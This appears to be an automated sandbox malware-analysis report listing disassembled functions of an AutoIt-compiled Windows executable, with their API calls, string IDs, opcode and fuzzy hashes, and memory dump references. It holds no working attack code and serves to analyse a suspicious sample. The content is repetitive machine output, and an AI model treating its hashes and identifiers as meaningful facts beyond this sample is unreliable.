                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: 72ea031cc13b219860b7df9251a24cb5db24eb5cf2daed8cd3fbb1ab2f8aa58d
                                                                                                                      • Instruction ID: d063928c99b5e339967dd805b8caca7e0878d430441219aaff95a85db10e3bf4
                                                                                                                      • Opcode Fuzzy Hash: 72ea031cc13b219860b7df9251a24cb5db24eb5cf2daed8cd3fbb1ab2f8aa58d
                                                                                                                      • Instruction Fuzzy Hash: 2C21B032600118BFEF118F54DC85FEB3BBAFB8A758F018128F9459B1A0C6719C5197A1
                                                                                                                      Function 005339E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __snwprintf.LIBCMT ref: 00533A66
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$%U
                                                                                                                      • API String ID: 3506404897-3415628243
                                                                                                                      • Opcode ID: 41833e337e82969657b4a68bdf64b2a5c9f5768688c8ad9973dbf1b66ebdc3e2
                                                                                                                      • Instruction ID: 357b1a944046ce462155c21f66220d7c4df35013da472eb5f89f079046904058
                                                                                                                      • Opcode Fuzzy Hash: 41833e337e82969657b4a68bdf64b2a5c9f5768688c8ad9973dbf1b66ebdc3e2
                                                                                                                      • Instruction Fuzzy Hash: 7521A034600219AFCF10EF65DC86EAE7BB9BF44314F40446DF449AB182DB34EA45CB65
                                                                                                                      Function 0054770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00547772
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00547787
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00547794
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: ee3f02713d9be5a87b262b649cc3855c5cc364fae20b0d8347beefb3db457a8d
                                                                                                                      • Instruction ID: 282f07e350a780c7d2100a2ff2d6f4997c9ef6b698793423b0dc9855ce72ea61
                                                                                                                      • Opcode Fuzzy Hash: ee3f02713d9be5a87b262b649cc3855c5cc364fae20b0d8347beefb3db457a8d
                                                                                                                      • Instruction Fuzzy Hash: 16112772244208BAEF105F65CC05FE77B68FF89B58F014118FA45A2091D771E811DB20
                                                                                                                      Function 004E6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __calloc_crt
                                                                                                                      • String ID: W$@BX
                                                                                                                      • API String ID: 3494438863-1013435409
                                                                                                                      • Opcode ID: 4cb51a435faf33ea61271a740555d8030a1d5dfef60df802a5ae996f4f943a89
                                                                                                                      • Instruction ID: 77f10357b4a3632c8c503d3076b42e55c74a5ae09b0aa32be79aef41884ec355
                                                                                                                      • Opcode Fuzzy Hash: 4cb51a435faf33ea61271a740555d8030a1d5dfef60df802a5ae996f4f943a89
                                                                                                                      • Instruction Fuzzy Hash: 47F0A4792046618FE7258F67BC52A522794E724375F11045BE505DE280FF38A8455788
                                                                                                                      Function 004E9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 004E9B94
                                                                                                                        • Part of subcall function 004E9C0B: __mtinitlocknum.LIBCMT ref: 004E9C1D
                                                                                                                        • Part of subcall function 004E9C0B: EnterCriticalSection.KERNEL32(00000000,?,004E9A7C,0000000D), ref: 004E9C36
                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 004E9BA4
                                                                                                                        • Part of subcall function 004E9100: ___addlocaleref.LIBCMT ref: 004E911C
                                                                                                                        • Part of subcall function 004E9100: ___removelocaleref.LIBCMT ref: 004E9127
                                                                                                                        • Part of subcall function 004E9100: ___freetlocinfo.LIBCMT ref: 004E913B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                      • String ID: 8W$8W
                                                                                                                      • API String ID: 547918592-3935117004
                                                                                                                      • Opcode ID: 7437a0e469d7bf0c25225a054d4c15b046daf13dda084abc6252693a6631ed17
                                                                                                                      • Instruction ID: bf681547375111861356990f9e7a458c8796a310f0a8fdd3fd85617b049bc342
                                                                                                                      • Opcode Fuzzy Hash: 7437a0e469d7bf0c25225a054d4c15b046daf13dda084abc6252693a6631ed17
                                                                                                                      • Instruction Fuzzy Hash: E8E046B1942340AAEA10BBA77D03B096E90AB44B2BF20419FF05D550C28E681D40A61F
                                                                                                                      Function 004C4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004C4BD0,?,004C4DEF,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4C11
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004C4C23
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                      • Opcode ID: 65e946d01f6f7720d9f10f539cf06d4ffa72dc618ec503b7ba37b0f309527771
                                                                                                                      • Instruction ID: 317e45c83cb63b54c250b1cb8773e86b547fe0503cbbae13cc20ebca0c0ff96e
                                                                                                                      • Opcode Fuzzy Hash: 65e946d01f6f7720d9f10f539cf06d4ffa72dc618ec503b7ba37b0f309527771
                                                                                                                      • Instruction Fuzzy Hash: 9BD0C274500713CFC7205F74DA08A47BAD5EF0A345B01CC3E9485C2660E6B4C480C710
                                                                                                                      Function 004C4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004C4B83,?), ref: 004C4C44
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004C4C56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                      • Opcode ID: ae6b0416dc2c164a43cb3f337b24307b65c84ffbde69bca28b36a47090e525b7
                                                                                                                      • Instruction ID: fa8f031784bdd3bc299980048831cdcc9d30367b28e189ede1820c0e76fd9a2c
                                                                                                                      • Opcode Fuzzy Hash: ae6b0416dc2c164a43cb3f337b24307b65c84ffbde69bca28b36a47090e525b7
                                                                                                                      • Instruction Fuzzy Hash: 70D01274510713CFD7205F35DA18B4777D4AF16355B11C83E9495D6270E674D480D750
                                                                                                                      Function 00540DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00541039), ref: 00540DF5
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00540E07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: 034d35ec1f9e4e35770a54be5c6fd29fa13944dc96d12261526b314b7e5f0bc9
                                                                                                                      • Instruction ID: 6ae5bba04e560c79af120bbc22d4596ec449814dd2aa9596201adad3cd15acc5
                                                                                                                      • Opcode Fuzzy Hash: 034d35ec1f9e4e35770a54be5c6fd29fa13944dc96d12261526b314b7e5f0bc9
                                                                                                                      • Instruction Fuzzy Hash: E7D01274510732CFD7205F75D8086C67AD9BF15355F11DC3D9585DA190D6B0D4A0D760
                                                                                                                      Function 005390E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00538CF4,?,0054F910), ref: 005390EE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00539100
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                      • Opcode ID: 92d6dbec81e5b2dde456257e89267b946547e0e37d1174c68a57aaee75a99928
                                                                                                                      • Instruction ID: 957e77dfb995de12964c3973fd41694d39e296e6b63bae140d4ab2f644171200
                                                                                                                      • Opcode Fuzzy Hash: 92d6dbec81e5b2dde456257e89267b946547e0e37d1174c68a57aaee75a99928
                                                                                                                      • Instruction Fuzzy Hash: 2FD01274550713CFD7209F35D81C5467BD4BF16355F11C839D485D6650E6B0C880D760
                                                                                                                      Function 00501714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: d5c5a26a0e7bdc1cb20bf870c2698b733859632288d48ddd09e9efa815d1e0ab
                                                                                                                      • Instruction ID: 48911e6acdab86d0f78ea1db1340a8665f4055f0ccd36aa27adb92d4d5bffbd3
                                                                                                                      • Opcode Fuzzy Hash: d5c5a26a0e7bdc1cb20bf870c2698b733859632288d48ddd09e9efa815d1e0ab
                                                                                                                      • Instruction Fuzzy Hash: B4D01775848508EBCB109AA19D88CFD7B7CFB19316F540862F806A2080E2259B95EA2B
                                                                                                                      Function 0051717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0903d3569606d879a0e71ab6e68eec251859bcc6d298b0b2c0a2366bde07623d
                                                                                                                      • Instruction ID: f49a0cd6ba04b710bf14d43963b9696d93859adf355664c3ef70fed6b5533297
                                                                                                                      • Opcode Fuzzy Hash: 0903d3569606d879a0e71ab6e68eec251859bcc6d298b0b2c0a2366bde07623d
                                                                                                                      • Instruction Fuzzy Hash: E5C16E74A0421AEFDB14CFA8C884EAEBBB5FF4C714B148998E815DB251D770ED81DB90
                                                                                                                      Function 0053E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0053E0BE
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0053E101
                                                                                                                        • Part of subcall function 0053D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0053D7C5
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0053E301
                                                                                                                      • _memmove.LIBCMT ref: 0053E314
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3659485706-0
                                                                                                                      • Opcode ID: 5b82925d2fc7b1683bb80c68101098bee0e7b3b1b19283ff4ec581c7afca6dc7
                                                                                                                      • Instruction ID: bd67f3102d1dbda8eb4dded0870e520ccfb3c11fb731a482fa529ad054e22354
                                                                                                                      • Opcode Fuzzy Hash: 5b82925d2fc7b1683bb80c68101098bee0e7b3b1b19283ff4ec581c7afca6dc7
                                                                                                                      • Instruction Fuzzy Hash: F2C167756083019FC744DF29C481A6ABBE4FF89718F14896EF8999B391D730E946CB82
                                                                                                                      Function 00538093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005380C3
                                                                                                                      • CoUninitialize.OLE32 ref: 005380CE
                                                                                                                        • Part of subcall function 0051D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0051D5D4
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005380D9
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005383AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 780911581-0
                                                                                                                      • Opcode ID: 2f230f8e3af04903d30760439fc4ded6cb3a989ea3c76d6643ac4d2cb47e0b7d
                                                                                                                      • Instruction ID: b6e1092f502747370bfd5eb1a216c46dead5000c4f4a44680a4fb5d38e644751
                                                                                                                      • Opcode Fuzzy Hash: 2f230f8e3af04903d30760439fc4ded6cb3a989ea3c76d6643ac4d2cb47e0b7d
                                                                                                                      • Instruction Fuzzy Hash: 86A14779604701AFCB44EF15C885B2ABBE4BF89718F14484DF9969B3A1CB34ED04CB96
                                                                                                                      Function 0051687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2808897238-0
                                                                                                                      • Opcode ID: bebcdaf46ca8c4de46506c44c9f75ff53d75d39028a53bfc525327f953c4bd20
                                                                                                                      • Instruction ID: d2f2a994de4df8dfdd5bf6bfe43cd918c4a4bc40b490853744f06c51961bcd64
                                                                                                                      • Opcode Fuzzy Hash: bebcdaf46ca8c4de46506c44c9f75ff53d75d39028a53bfc525327f953c4bd20
                                                                                                                      • Instruction Fuzzy Hash: 2C51B278700302EAEB24AF65D895ABABBE5BF45310F20D81FE596DB291DB74D8C08705
                                                                                                                      Function 005497F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(0108EA30,?), ref: 00549863
                                                                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00549896
                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00549903
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3880355969-0
                                                                                                                      • Opcode ID: d70ff47bb0d3578dc371b760ae217d8fbf7a5f9c77bb51fd728ea6749ffea65c
                                                                                                                      • Instruction ID: 0b759c14f7ca85276eed01cc4ba01ad60d7ed6d4bc06eb8a024d1f29a5b1b9e4
                                                                                                                      • Opcode Fuzzy Hash: d70ff47bb0d3578dc371b760ae217d8fbf7a5f9c77bb51fd728ea6749ffea65c
                                                                                                                      • Instruction Fuzzy Hash: 77513C34A00209EFCB14DF68C885AEE7BB5FF56364F14816DF855AB2A0D730AD41DB90
                                                                                                                      Function 00519A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00519AD2
                                                                                                                      • __itow.LIBCMT ref: 00519B03
                                                                                                                        • Part of subcall function 00519D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00519DBE
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00519B6C
